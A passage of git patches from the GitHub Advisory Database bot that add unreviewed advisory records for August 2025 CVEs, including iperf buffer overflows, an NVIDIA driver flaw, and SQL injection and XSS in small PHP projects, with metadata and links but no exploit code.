"github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wrxq-9fmf-hq5j/GHSA-wrxq-9fmf-hq5j.json b/advisories/unreviewed/2025/08/GHSA-wrxq-9fmf-hq5j/GHSA-wrxq-9fmf-hq5j.json new file mode 100644 index 0000000000000..f282b4ac6e57b --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wrxq-9fmf-hq5j/GHSA-wrxq-9fmf-hq5j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrxq-9fmf-hq5j", + "modified": "2025-08-03T00:30:23Z", + "published": "2025-08-03T00:30:23Z", + "aliases": [ + "CVE-2025-23277" + ], + "details": "NVIDIA Display Driver for Linux and Windows contains a vulnerability in the kernel mode driver, where an attacker could access memory outside bounds permitted under normal use cases. A successful exploit of this vulnerability might lead to denial of service, data tampering, or information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23277" + }, + { + "type": "WEB", + "url": "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:44Z" + } +} \ No newline at end of file From d8227b901065d62cf225c8df316031a157a7034f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 03:32:29 +0000 Subject: [PATCH 317/323] Publish Advisories GHSA-8xx8-qrh3-q8mq GHSA-9235-mc99-3px2 GHSA-r6x8-74x9-5mc9 GHSA-xjwm-4pfw-49g2 --- .../GHSA-8xx8-qrh3-q8mq.json | 40 +++++++++++++ .../GHSA-9235-mc99-3px2.json | 56 +++++++++++++++++++ .../GHSA-r6x8-74x9-5mc9.json | 40 +++++++++++++ .../GHSA-xjwm-4pfw-49g2.json | 40 +++++++++++++ 4 files changed, 176 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-8xx8-qrh3-q8mq/GHSA-8xx8-qrh3-q8mq.json create mode 100644 advisories/unreviewed/2025/08/GHSA-9235-mc99-3px2/GHSA-9235-mc99-3px2.json create mode 100644 advisories/unreviewed/2025/08/GHSA-r6x8-74x9-5mc9/GHSA-r6x8-74x9-5mc9.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xjwm-4pfw-49g2/GHSA-xjwm-4pfw-49g2.json diff --git a/advisories/unreviewed/2025/08/GHSA-8xx8-qrh3-q8mq/GHSA-8xx8-qrh3-q8mq.json b/advisories/unreviewed/2025/08/GHSA-8xx8-qrh3-q8mq/GHSA-8xx8-qrh3-q8mq.json new file mode 100644 index 0000000000000..7c1c99b504b96 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8xx8-qrh3-q8mq/GHSA-8xx8-qrh3-q8mq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xx8-qrh3-q8mq", + "modified": "2025-08-03T03:30:30Z", + "published": "2025-08-03T03:30:29Z", + "aliases": [ + "CVE-2025-54349" + ], + "details": "In iperf before 3.19.1, iperf_auth.c has an off-by-one error and resultant heap-based buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54349" + }, + { + "type": "WEB", + "url": "https://github.com/esnet/iperf/commit/4e5313bab0b9b3fe03513ab54f722c8a3e4b7bdf" + }, + { + "type": "WEB", + "url": "https://github.com/esnet/iperf/releases/tag/3.19.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-193" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T02:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-9235-mc99-3px2/GHSA-9235-mc99-3px2.json b/advisories/unreviewed/2025/08/GHSA-9235-mc99-3px2/GHSA-9235-mc99-3px2.json new file mode 100644 index 0000000000000..9292bf004ed5a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-9235-mc99-3px2/GHSA-9235-mc99-3px2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9235-mc99-3px2", + "modified": "2025-08-03T03:30:30Z", + "published": "2025-08-03T03:30:30Z", + "aliases": [ + "CVE-2025-8495" + ], + "details": "A vulnerability, which was classified as critical, was found in code-projects Intern Membership Management System 1.0. Affected is an unknown function of the file /admin/edit_admin_query.php. The manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8495" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318594" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318594" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626722" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/gongzi-jsnek/xb2q3a/dctpzq93gcaop8qo?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T02:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-r6x8-74x9-5mc9/GHSA-r6x8-74x9-5mc9.json b/advisories/unreviewed/2025/08/GHSA-r6x8-74x9-5mc9/GHSA-r6x8-74x9-5mc9.json new file mode 100644 index 0000000000000..be804188a492d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-r6x8-74x9-5mc9/GHSA-r6x8-74x9-5mc9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6x8-74x9-5mc9", + "modified": "2025-08-03T03:30:30Z", + "published": "2025-08-03T03:30:30Z", + "aliases": [ + "CVE-2025-54350" + ], + "details": "In iperf before 3.19.1, iperf_auth.c has a Base64Decode assertion failure and application exit upon a malformed authentication attempt.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54350" + }, + { + "type": "WEB", + "url": "https://github.com/esnet/iperf/commit/4eab661da0bbaac04493fa40164e928c6df7934a" + }, + { + "type": "WEB", + "url": "https://github.com/esnet/iperf/releases/tag/3.19.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-617" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T02:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xjwm-4pfw-49g2/GHSA-xjwm-4pfw-49g2.json b/advisories/unreviewed/2025/08/GHSA-xjwm-4pfw-49g2/GHSA-xjwm-4pfw-49g2.json new file mode 100644 index 0000000000000..e3e22274a617a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xjwm-4pfw-49g2/GHSA-xjwm-4pfw-49g2.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjwm-4pfw-49g2", + "modified": "2025-08-03T03:30:30Z", + "published": "2025-08-03T03:30:30Z", + "aliases": [ + "CVE-2025-54351" + ], + "details": "In iperf before 3.19.1, net.c has a buffer overflow when --skip-rx-copy is used (for MSG_TRUNC in recv).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54351" + }, + { + "type": "WEB", + "url": "https://github.com/esnet/iperf/commit/969b7f70c447513e92c9798f22e82b40ebc53bf0" + }, + { + "type": "WEB", + "url": "https://github.com/esnet/iperf/releases/tag/3.19.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-420" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T02:15:37Z" + } +} \ No newline at end of file From 8fc098056b2a44c446bf38a4679c311de4247cdd Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 06:32:29 +0000 Subject: [PATCH 318/323] Publish Advisories GHSA-7j92-2vfh-4g6w GHSA-h897-rm87-xgw4 GHSA-hqgx-9pq6-9vw7 GHSA-p9mr-7854-3j3g GHSA-v6wv-xm4x-3qv2 GHSA-xpq2-87j9-cv9g --- .../GHSA-7j92-2vfh-4g6w.json | 56 +++++++++++++++++++ .../GHSA-h897-rm87-xgw4.json | 56 +++++++++++++++++++ .../GHSA-hqgx-9pq6-9vw7.json | 56 +++++++++++++++++++ .../GHSA-p9mr-7854-3j3g.json | 52 +++++++++++++++++ .../GHSA-v6wv-xm4x-3qv2.json | 56 +++++++++++++++++++ .../GHSA-xpq2-87j9-cv9g.json | 56 +++++++++++++++++++ 6 files changed, 332 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-7j92-2vfh-4g6w/GHSA-7j92-2vfh-4g6w.json create mode 100644 advisories/unreviewed/2025/08/GHSA-h897-rm87-xgw4/GHSA-h897-rm87-xgw4.json create mode 100644 advisories/unreviewed/2025/08/GHSA-hqgx-9pq6-9vw7/GHSA-hqgx-9pq6-9vw7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-p9mr-7854-3j3g/GHSA-p9mr-7854-3j3g.json create mode 100644 advisories/unreviewed/2025/08/GHSA-v6wv-xm4x-3qv2/GHSA-v6wv-xm4x-3qv2.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xpq2-87j9-cv9g/GHSA-xpq2-87j9-cv9g.json diff --git a/advisories/unreviewed/2025/08/GHSA-7j92-2vfh-4g6w/GHSA-7j92-2vfh-4g6w.json b/advisories/unreviewed/2025/08/GHSA-7j92-2vfh-4g6w/GHSA-7j92-2vfh-4g6w.json new file mode 100644 index 0000000000000..7548954f4005c --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7j92-2vfh-4g6w/GHSA-7j92-2vfh-4g6w.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7j92-2vfh-4g6w", + "modified": "2025-08-03T06:30:27Z", + "published": "2025-08-03T06:30:27Z", + "aliases": [ + "CVE-2025-8501" + ], + "details": "A vulnerability classified as problematic has been found in code-projects Human Resource Integrated System 1.0. Affected is an unknown function of the file /insert-and-view/action.php. The manipulation of the argument content leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8501" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://github.com/shenxianyuguitian/hris-vuln-XSS/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318600" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318600" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626792" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T06:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-h897-rm87-xgw4/GHSA-h897-rm87-xgw4.json b/advisories/unreviewed/2025/08/GHSA-h897-rm87-xgw4/GHSA-h897-rm87-xgw4.json new file mode 100644 index 0000000000000..8f4688fb46406 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-h897-rm87-xgw4/GHSA-h897-rm87-xgw4.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h897-rm87-xgw4", + "modified": "2025-08-03T06:30:27Z", + "published": "2025-08-03T06:30:27Z", + "aliases": [ + "CVE-2025-8500" + ], + "details": "A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /insert-and-view/action.php. The manipulation of the argument content leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8500" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://github.com/shenxianyuguitian/hris-vuln-sqli/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318599" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318599" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T05:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-hqgx-9pq6-9vw7/GHSA-hqgx-9pq6-9vw7.json b/advisories/unreviewed/2025/08/GHSA-hqgx-9pq6-9vw7/GHSA-hqgx-9pq6-9vw7.json new file mode 100644 index 0000000000000..4ddf9b9f2db16 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-hqgx-9pq6-9vw7/GHSA-hqgx-9pq6-9vw7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hqgx-9pq6-9vw7", + "modified": "2025-08-03T06:30:27Z", + "published": "2025-08-03T06:30:27Z", + "aliases": [ + "CVE-2025-8499" + ], + "details": "A vulnerability was found in code-projects Online Medicine Guide 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /cusfindambulence2.php. The manipulation of the argument Search leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8499" + }, + { + "type": "WEB", + "url": "https://github.com/joker-vip/cvesubmit/issues/1" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318598" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318598" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626778" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T05:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-p9mr-7854-3j3g/GHSA-p9mr-7854-3j3g.json b/advisories/unreviewed/2025/08/GHSA-p9mr-7854-3j3g/GHSA-p9mr-7854-3j3g.json new file mode 100644 index 0000000000000..973bca98bfa9c --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-p9mr-7854-3j3g/GHSA-p9mr-7854-3j3g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9mr-7854-3j3g", + "modified": "2025-08-03T06:30:27Z", + "published": "2025-08-03T06:30:27Z", + "aliases": [ + "CVE-2025-8496" + ], + "details": "A vulnerability has been found in projectworlds Online Admission System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /viewform.php. The manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8496" + }, + { + "type": "WEB", + "url": "https://github.com/huangtinlin/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318595" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318595" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626766" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T04:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-v6wv-xm4x-3qv2/GHSA-v6wv-xm4x-3qv2.json b/advisories/unreviewed/2025/08/GHSA-v6wv-xm4x-3qv2/GHSA-v6wv-xm4x-3qv2.json new file mode 100644 index 0000000000000..bf01f586faac9 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-v6wv-xm4x-3qv2/GHSA-v6wv-xm4x-3qv2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6wv-xm4x-3qv2", + "modified": "2025-08-03T06:30:27Z", + "published": "2025-08-03T06:30:27Z", + "aliases": [ + "CVE-2025-8498" + ], + "details": "A vulnerability was found in code-projects Online Medicine Guide 1.0. It has been classified as critical. This affects an unknown part of the file /cart/index.php. The manipulation of the argument uname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8498" + }, + { + "type": "WEB", + "url": "https://github.com/shokaku-cyb/cve/issues/1" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318597" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318597" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626777" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T04:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xpq2-87j9-cv9g/GHSA-xpq2-87j9-cv9g.json b/advisories/unreviewed/2025/08/GHSA-xpq2-87j9-cv9g/GHSA-xpq2-87j9-cv9g.json new file mode 100644 index 0000000000000..c524e925c482a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xpq2-87j9-cv9g/GHSA-xpq2-87j9-cv9g.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpq2-87j9-cv9g", + "modified": "2025-08-03T06:30:27Z", + "published": "2025-08-03T06:30:27Z", + "aliases": [ + "CVE-2025-8497" + ], + "details": "A vulnerability was found in code-projects Online Medicine Guide 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /cusfindphar2.php. The manipulation of the argument Search leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8497" + }, + { + "type": "WEB", + "url": "https://github.com/shokaku-cyb/cve/issues/2" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318596" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318596" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626776" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T04:15:51Z" + } +} \ No newline at end of file From d13be93b5ee4e91e69987fd0272891d300c1cc9e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 09:33:29 +0000 Subject: [PATCH 319/323] Publish Advisories GHSA-5mpp-7hmq-qxfv GHSA-6397-2hfr-hmjp GHSA-c784-48q7-28q9 GHSA-ffrh-25w3-cmvh GHSA-q2w7-9xcp-64v5 GHSA-r935-cx2h-crwf --- .../GHSA-5mpp-7hmq-qxfv.json | 6 +- .../GHSA-6397-2hfr-hmjp.json | 52 +++++++++++++++++ .../GHSA-c784-48q7-28q9.json | 56 +++++++++++++++++++ .../GHSA-ffrh-25w3-cmvh.json | 52 +++++++++++++++++ .../GHSA-q2w7-9xcp-64v5.json | 56 +++++++++++++++++++ .../GHSA-r935-cx2h-crwf.json | 56 +++++++++++++++++++ 6 files changed, 277 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-6397-2hfr-hmjp/GHSA-6397-2hfr-hmjp.json create mode 100644 advisories/unreviewed/2025/08/GHSA-c784-48q7-28q9/GHSA-c784-48q7-28q9.json create mode 100644 advisories/unreviewed/2025/08/GHSA-ffrh-25w3-cmvh/GHSA-ffrh-25w3-cmvh.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q2w7-9xcp-64v5/GHSA-q2w7-9xcp-64v5.json create mode 100644 advisories/unreviewed/2025/08/GHSA-r935-cx2h-crwf/GHSA-r935-cx2h-crwf.json diff --git a/advisories/unreviewed/2025/07/GHSA-5mpp-7hmq-qxfv/GHSA-5mpp-7hmq-qxfv.json b/advisories/unreviewed/2025/07/GHSA-5mpp-7hmq-qxfv/GHSA-5mpp-7hmq-qxfv.json index ac8f08c41bf71..7ec2b7c85f0db 100644 --- a/advisories/unreviewed/2025/07/GHSA-5mpp-7hmq-qxfv/GHSA-5mpp-7hmq-qxfv.json +++ b/advisories/unreviewed/2025/07/GHSA-5mpp-7hmq-qxfv/GHSA-5mpp-7hmq-qxfv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mpp-7hmq-qxfv", - "modified": "2025-07-28T15:31:37Z", + "modified": "2025-08-03T09:31:49Z", "published": "2025-07-27T06:30:27Z", "aliases": [ "CVE-2025-8220" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://docs.google.com/document/d/1fbe1o3ncvmYbw-w1MKMUJg7z-qu1Wyo81y9isFlNyi0/edit?usp=sharing" }, + { + "type": "WEB", + "url": "https://github.com/m3m0o/engeman-web-language-combobox-sqli" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.317808" diff --git a/advisories/unreviewed/2025/08/GHSA-6397-2hfr-hmjp/GHSA-6397-2hfr-hmjp.json b/advisories/unreviewed/2025/08/GHSA-6397-2hfr-hmjp/GHSA-6397-2hfr-hmjp.json new file mode 100644 index 0000000000000..74cd1335c1c78 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-6397-2hfr-hmjp/GHSA-6397-2hfr-hmjp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6397-2hfr-hmjp", + "modified": "2025-08-03T09:31:50Z", + "published": "2025-08-03T09:31:50Z", + "aliases": [ + "CVE-2025-8505" + ], + "details": "A vulnerability has been found in 495300897 wx-shop up to de1b66331368695779cfc6e4d11a64caddf8716e and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8505" + }, + { + "type": "WEB", + "url": "https://github.com/Bemcliu/cve-reports/blob/main/cve-08-wx-shop-CSRF/readme.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318604" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318604" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.627322" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T08:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-c784-48q7-28q9/GHSA-c784-48q7-28q9.json b/advisories/unreviewed/2025/08/GHSA-c784-48q7-28q9/GHSA-c784-48q7-28q9.json new file mode 100644 index 0000000000000..35ac39588287e --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-c784-48q7-28q9/GHSA-c784-48q7-28q9.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c784-48q7-28q9", + "modified": "2025-08-03T09:31:49Z", + "published": "2025-08-03T09:31:49Z", + "aliases": [ + "CVE-2025-8502" + ], + "details": "A vulnerability classified as critical was found in code-projects Online Medicine Guide 1.0. Affected by this vulnerability is an unknown functionality of the file /changepass.php. The manipulation of the argument ups leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": 